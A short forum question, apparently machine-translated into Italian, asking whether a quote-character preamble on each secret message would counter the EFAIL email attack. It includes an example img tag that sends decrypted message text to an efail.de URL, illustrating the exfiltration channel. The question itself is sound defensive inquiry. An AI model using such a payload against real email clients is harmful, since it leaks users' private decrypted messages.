Nel modo in cui ho capito EFAIL , l'attacco funziona perché i client di posta elettronica possono essere costretti a concatenare il messaggio decrittografato nel testo fornito dall'attaccante per risultare in un URL.
Ma non sarebbe una contromisura usare un preambolo adatto con ogni messaggio segreto inviato, come
nice try " '
Secret meeting
Tomorrow 9pm
? Il modo in cui comprendo l'attacco (s), questo si tradurrebbe in qualcosa di simile
<img src="http://efail.de/nice%20try%"'SecretmeetingTomorrow9pm">
cioè, un tag img
che probabilmente non è nemmeno valido ed esplora solo il "bel tentativo" iniziale per l'autore dell'attacco.